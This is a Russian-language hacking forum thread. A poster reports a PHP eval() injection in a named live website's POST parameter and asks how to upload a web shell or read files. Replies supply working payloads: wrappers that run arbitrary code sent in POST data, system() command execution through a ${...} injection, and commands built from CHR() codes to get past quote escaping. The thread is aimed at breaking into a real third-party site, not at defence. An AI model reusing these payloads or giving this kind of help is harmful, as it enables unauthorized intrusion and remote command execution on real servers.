![]() |
Нашел уязвимость в POST параметре option_id на сайте
http://www. shans.com. ua/ HackBar'ом передаю POST запрос option_id={${$print(1)}}{${$print(1)}}{${$print(1) }} option_id={${$phpinfo()}} Скрипт отрабатывает.... Данные передаются в eval() Кавычки экранируются.... Как залить шелл или прочитать файлы... base64_encode() не срабатывает... пытался залить через curl_init().... Непойму почему данные передаются в "{}" без ";" Вот так не работает {${$a=1; $print($a);}... А так выводит данные - {${$a=1}}{${$print($a)}} в гугле не нашел как выглядит данный скрипт... Если есть чтото подобное киньте ссылку... |
option_id={${eval(stripslashes($_POST
Код:
))}}&code=print 'so good'; |
Добырый день
есть пост запрос Код:
submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system(ls))}\ |
Цитата:
Код:
@print(system(CHR(108).CHR(115).CHR(32).CHR(45).CHR(108).CHR(97)))или подстановкой пост параметра: Код:
submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system($_POST[cmd]))}\&cmd=ls -la |
Цитата:
|
Присоединяюсь -winstrool спасибо ОГРОМНОЕ!
|
Рад, что вы рады)
|
| Время: 22:31 |